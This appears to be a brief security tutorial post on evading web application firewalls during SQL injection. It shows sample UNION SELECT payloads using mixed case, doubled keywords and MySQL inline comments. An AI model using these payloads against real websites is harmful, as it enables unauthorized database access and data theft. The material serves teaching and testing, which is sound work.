Ready to Start Your Career?

Part 2: Bypass a Web Application Firewall (WAF)

S-Connect 's profile image

By: S-Connect

July 29, 2016

fireball-cybraryFunction Capitalization Technique:-For those WAF's, which filter only lowercase, we can easily bypass:Query! UNION SELECT 1,2,3—Bypass! uniOn SeLeCt 1,2,3— Replaced Keywords Technique:-For those WAF's, which escape certain keywords such as UNION, SELECT, ORDER BY, and so on:Query! UNION SELECT 1,2—Bypass! UNIunionON SEselectLECT 1,2—Sqli union all select 1,2,3—-By passed Sqli /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3—- 
Stay Linked!!Ali Tabish
Schedule Demo